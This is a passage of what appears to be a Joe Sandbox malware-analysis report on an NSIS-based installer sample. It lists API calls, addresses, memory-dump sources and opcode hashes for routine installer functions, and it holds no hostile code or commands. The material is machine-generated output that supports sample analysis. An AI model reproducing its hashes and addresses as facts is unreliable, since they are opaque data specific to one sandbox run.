                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
